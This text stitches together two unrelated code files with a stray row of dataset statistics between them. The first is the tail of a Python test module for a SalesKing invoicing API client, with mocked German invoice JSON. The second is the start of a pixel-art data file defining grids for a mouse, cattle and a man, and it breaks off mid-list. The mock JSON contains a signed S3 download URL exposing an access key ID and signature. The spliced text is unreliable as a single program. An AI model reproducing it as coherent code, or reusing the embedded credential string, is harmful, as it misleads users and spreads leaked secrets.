{"id":"bUAnt0lb4r4BelabxfpGMl","position":2,"name":"Kaffee trinken","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tassen","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}},
{"line_item":
{"id":"bUAoPMlb4r4BelabxfpGMl","position":3,"name":"Bugs Programmieren","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Stunden","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}
}],
"items":
[{"line_item":
{"id":"bUAl2ylb4r4BelabxfpGMl","position":4,"name":"Projektarbeit","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tage","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}
},
{"line_item":
{"id":"bUAnt0lb4r4BelabxfpGMl","position":5,"name":"Kaffee trinken","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tassen","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}},
{"line_item":
{"id":"bUAoPMlb4r4BelabxfpGMl","position":6,"name":"Bugs Programmieren","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Stunden","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}
}],
"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2013-01-23T09:56:46+01:00","lock_version":1,"price_total":1950.0,"price_tax":0.0,"gross_total":1950.0,"tax_total":0.0,"net_total":1950.0,"net_total_base":1950.0,"cost_total":0.0,"gross_margin_total":1950.0,"gross_margin_pct":100.0,"recurring_id":null},
"links":[{"rel":"self","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"instances","href":"invoices"},
{"rel":"destroy","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"update","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"create","href":"invoices"},
{"rel":"attachments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/attachments"},
{"rel":"payments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"payment_reminders","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"payment create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"print","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/print"}]
}
'''.replace(u"\n", u"").replace(u"\t", u"").replace(u" ", u"")
class MockInvoiceNoLineItemResponse(object):
    """Canned HTTP response standing in for a SalesKing "get invoice" call.

    Mimics the two attributes the client code reads from a real response
    object: ``status_code`` and ``content``.  The payload is the same
    invoice as the full mock above but with ``line_items`` and ``items``
    set to empty lists, so tests can exercise the no-line-item path.
    """

    def __init__(self):
        # type: () -> None
        # Always reports success; tests using this mock only exercise
        # the response-parsing path, not HTTP error handling.
        self.status_code = 200
        # Raw JSON body.  NOTE(review): the .replace() chain below strips
        # every newline, tab and space from the literal -- including
        # whitespace inside JSON string values (e.g. "Projekt Tippspiel"
        # becomes "ProjektTippspiel", and the \n escapes in address_field
        # are real newlines in this u'''...''' literal and are removed
        # too).  The assertions in this file only touch space-free values,
        # so this appears intentional for compactness -- confirm before
        # relying on any value that originally contained whitespace.
        self.content = u'''
{"invoice":
{"id":"bUAr_Qlb4r4BelabxfpGMl","number":"R-069-2011-215","address_field":"Werbeagentur Gl\u00fcck\nKleeweg 4\n30001 Berlin","date":"2011-12-21","due_days":3,"due_date":"2011-12-24","status":"closed","external_ref":null,"payment_method":null,"title":"Projekt Tippspiel","notes_before":"Wir m\u00f6chten Ihnen folgende Positionen in Rechnung stellen:","notes_after":"Bitte \u00fcberweisen Sie den Rechnungsbetrag bis zum 24.12.2011.","tag_list":"!example","language":null,"currency":"EUR","exchange_rate":null,"gross_total_exchanged":1950.0,
"archived_pdf":
{"attachment":
{"id":"bVKYQ-lb4r4BelabxfpGMl","filename":"just_a_test.pdf","disk_filename":"111221215503038_just_a_test.pdf","url":"https://sk2-dev.s3.amazonaws.com/cPUdkOlb0r4BelabxfpGMl/attachments/Document/111221215503038_just_a_test.pdf?X-Amz-Expires=1200&X-Amz-Date=20150128T181758Z&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=134E61V8BNTFFTK4T982/20150128/us-east-1/s3/aws4_request&X-Amz-SignedHeaders=host&X-Amz-Signature=6bcef58961133d4e28963f9e0643751cdaaa6d5a57505c4dd00df69de8628cfe","related_object_type":"Document","related_object_id":"bUAr_Qlb4r4BelabxfpGMl","content_type":"application/pdf","size":32814,"is_signed":null,"created_at":"2011-12-21T22:55:03+01:00",
"team_id":null},
"links":
[{"rel":"self","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"},
{"rel":"download","href":"attachments/bVKYQ-lb4r4BelabxfpGMl/download"},
{"rel":"instances","href":"attachments"},
{"rel":"destroy","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"}]
},
"sepa_mandate_id":null,"sepa_mandate_signed_at":null,"sepa_debit_sequence_type":null,
"client":{"links":[
{"rel":"self","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"clients"},
{"rel":"destroy","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"clients"},
{"rel":"documents","href":"clients/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"clients/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"clients/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"clients/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"clients/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"clients/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"clients/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"clients/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"clients/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"}
],
"client":{
"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,
"type":"Client","is_employee":false,"number":"K-01012-728",
"organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer",
"gender":"male",
"notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,
"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00",
"language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,
"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,
"lock_version":1,"cash_discount":null,"due_days":null,
"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin",
"addresses":[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001",
"state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00",
"address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}
}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,
"sales_potential":null,"probability":null,"expected_revenue":null}},
"client_id":"bUvvUglb4r4BelabxfpGMl",
"contact":
{"contact":
{"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,"type":"Client","is_employee":false,"number":"K-01012-728","organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer","gender":"male","notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00","language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,"lock_version":1,"cash_discount":null,"due_days":null,"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin","addresses":
[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001","state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00","address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,"sales_potential":null,"probability":null,"expected_revenue":null},
"links":[{"rel":"self","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"contacts"},
{"rel":"destroy","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"contacts"},
{"rel":"documents","href":"contacts/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"contacts/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"contacts/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"contacts/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"contacts/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"contacts/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"contacts/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"contacts/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"contacts/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"}]},
"contact_id":"bUvvUglb4r4BelabxfpGMl","team_id":null,
"line_items":[],
"items":[],
"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2013-01-23T09:56:46+01:00","lock_version":1,"price_total":1950.0,"price_tax":0.0,"gross_total":1950.0,"tax_total":0.0,"net_total":1950.0,"net_total_base":1950.0,"cost_total":0.0,"gross_margin_total":1950.0,"gross_margin_pct":100.0,"recurring_id":null},
"links":[{"rel":"self","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"instances","href":"invoices"},
{"rel":"destroy","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"update","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"create","href":"invoices"},
{"rel":"attachments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/attachments"},
{"rel":"payments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"payment_reminders","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"payment create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"print","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/print"}]
}
'''.replace(u"\n", u"").replace(u"\t", u"").replace(u" ", u"")
class InvoiceWithDocumentAttachmentTestCase(SalesKingBaseTestCase):
    """Checks that invoice model instances can be built from mocked responses."""

    def _fresh_invoice_model(self):
        # Common setup for both tests: a new API client and an empty
        # invoice model built from the dynamically generated model class.
        client = api.APIClient()
        invoice_class = resources.get_model_class("invoice", api=client)
        return invoice_class()

    def test_invoice_noLineitem_instaciated_mock_success(self):
        """A response whose invoice has no line items still yields an instance."""
        model = self._fresh_invoice_model()
        instance = model.to_instance(MockInvoiceNoLineItemResponse())
        self.assertIsNotNone(instance)
        self.assertEqual(instance.number, "R-069-2011-215")

    def test_invoice_instaciated_mock_fails(self):
        """The full mocked invoice exposes its number and nested client data."""
        model = self._fresh_invoice_model()
        instance = model.to_instance(MockInvoiceResponse())
        self.assertEqual(instance.number, "R-069-2011-215a")
        self.assertEqual(instance['client']['client']['number'], "K-01012-728")
| 99.115044 | 840 | 0.645848 | 2,565 | 22,400 | 5.469006 | 0.112671 | 0.009695 | 0.015968 | 0.025948 | 0.971985 | 0.970987 | 0.96065 | 0.956088 | 0.956088 | 0.956088 | 0 | 0.082624 | 0.150625 | 22,400 | 225 | 841 | 99.555556 | 0.654683 | 0 | 0 | 0.825688 | 0 | 0.155963 | 0.945982 | 0.699866 | 0 | 0 | 0 | 0 | 0.018349 | 1 | 0.018349 | false | 0 | 0.009174 | 0 | 0.041284 | 0.009174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
994a5838960c3de51feab43a751b8a1c8f1f8de3 | 12,507 | py | Python | function/subject.py | Jianghuchengphilip/Master-art-punk | 4102d82148bf571e0cd418e363c51fa8486c5a43 | [
"Apache-2.0"
] | 37 | 2022-01-12T07:07:59.000Z | 2022-03-31T10:25:46.000Z | function/subject.py | Jianghuchengphilip/Master-art-punk | 4102d82148bf571e0cd418e363c51fa8486c5a43 | [
"Apache-2.0"
] | 1 | 2022-01-25T12:24:57.000Z | 2022-02-03T10:45:00.000Z | function/subject.py | Jianghuchengphilip/Master-art-punk | 4102d82148bf571e0cd418e363c51fa8486c5a43 | [
"Apache-2.0"
] | 10 | 2022-01-12T07:29:37.000Z | 2022-03-28T23:37:42.000Z | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""=================================================
@Author :蒋虎成
@Date :2021/9/22 17:05
@Desc :绘图元素
=================================================="""
# 设置24*24的画布
canvas = {
'colors': [0],
'data': [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
}
mouse = {
'colors': [0, '000000', 'fe6f06', 'fbb988', 'd2d8db', 'ffffff', 'ecd993', '8af9ff', 'ff94f8', '998fff'],
'data': [
[9, 9, 9, 1, 1, 1, 1, 1, 1, 9, 9, 9, 9, 9, 9, 1, 1, 1, 1, 1, 1, 9, 9, 9],
[9, 9, 1, 2, 2, 2, 2, 2, 2, 1, 9, 9, 9, 9, 9, 1, 3, 3, 3, 3, 3, 1, 9, 9],
[9, 1, 2, 1, 1, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 3, 3, 3, 1, 1, 3, 1, 9],
[9, 1, 8, 8, 8, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 1, 8, 8, 8, 1, 9],
[9, 1, 8, 8, 8, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 1, 8, 8, 8, 1, 9],
[9, 1, 8, 8, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 5, 1, 8, 8, 1, 9],
[9, 9, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 5, 5, 5, 1, 1, 9, 9],
[9, 9, 9, 1, 2, 2, 1, 1, 1, 2, 2, 2, 4, 3, 3, 1, 1, 1, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 1, 2, 1, 1, 7, 7, 1, 4, 4, 3, 3, 1, 7, 7, 1, 1, 5, 1, 9, 9, 9],
[9, 9, 1, 2, 2, 1, 1, 7, 7, 1, 4, 4, 3, 3, 1, 7, 7, 1, 1, 5, 5, 1, 9, 9],
[9, 9, 1, 4, 4, 1, 7, 1, 1, 1, 4, 4, 5, 5, 1, 1, 1, 7, 1, 5, 5, 1, 9, 9],
[9, 9, 1, 1, 4, 4, 1, 1, 1, 4, 4, 5, 5, 5, 5, 1, 1, 1, 5, 5, 5, 1, 9, 9],
[9, 9, 1, 4, 4, 4, 4, 4, 4, 4, 4, 5, 1, 5, 5, 5, 5, 5, 5, 5, 5, 1, 9, 9],
[9, 9, 1, 1, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 9, 9],
[9, 9, 1, 4, 4, 4, 4, 4, 4, 1, 5, 5, 1, 5, 5, 1, 5, 5, 5, 5, 5, 1, 9, 9],
[9, 9, 9, 1, 4, 4, 4, 4, 5, 5, 1, 1, 5, 1, 1, 5, 5, 5, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 1, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 1, 1, 2, 3, 5, 1, 5, 5, 5, 5, 5, 5, 1, 5, 3, 2, 1, 1, 9, 9, 9],
[9, 9, 9, 1, 2, 3, 5, 6, 6, 1, 5, 5, 5, 5, 1, 6, 6, 5, 3, 2, 1, 9, 9, 9],
[9, 9, 9, 1, 5, 5, 1, 6, 6, 1, 5, 5, 5, 5, 1, 6, 6, 1, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 9, 1, 5, 5, 1, 1, 5, 5, 5, 5, 5, 5, 1, 1, 5, 5, 1, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 1, 5, 5, 5, 1, 1, 1, 1, 1, 1, 5, 5, 5, 1, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 1, 6, 6, 1, 1, 9, 9, 9, 9, 9, 9, 1, 1, 6, 6, 1, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 1, 1, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 1, 1, 9, 9, 9, 9, 9]
]
}
cattle = {
'colors': [0, '000000', 'faf9d4', 'ffffff', 'fe6f06', 'fbb988', 'd2d8db', 'ecd993', '8af9ff', 'ff94f8'],
'data': [
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 4, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 2, 4, 9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 4, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 2, 4, 9, 3, 3, 3, 3, 3, 9, 4, 2, 2, 4, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 3, 3, 4, 3, 3, 3, 5, 3, 3, 3, 3, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 3, 3, 4, 3, 3, 3, 5, 5, 3, 3, 4, 3, 3, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 4, 3, 3, 3, 5, 5, 4, 3, 3, 4, 9, 3, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 3, 3, 3, 5, 5, 5, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 3, 3, 4, 1, 5, 5, 5, 1, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 4, 4, 5, 5, 5, 4, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 4, 5, 5, 5, 5, 5, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 5, 5, 1, 5, 1, 5, 5, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 4, 5, 5, 5, 5, 5, 5, 5, 4, 4, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 4, 4, 5, 5, 5, 5, 5, 4, 4, 9, 8, 8, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 4, 9, 9, 9, 8, 8, 8, 8, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 4, 4, 4, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 6, 4, 6, 4, 4, 8, 8, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 7, 4, 7, 4, 7, 4, 7, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9]
]
}
man = {
'colors': [0, '000000', 'e0c29e', '585858', 'fdfdfd'],
'data': [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 3, 3, 2, 2, 2, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 4, 2, 2, 2, 1, 4, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 1, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 1, 1, 1, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
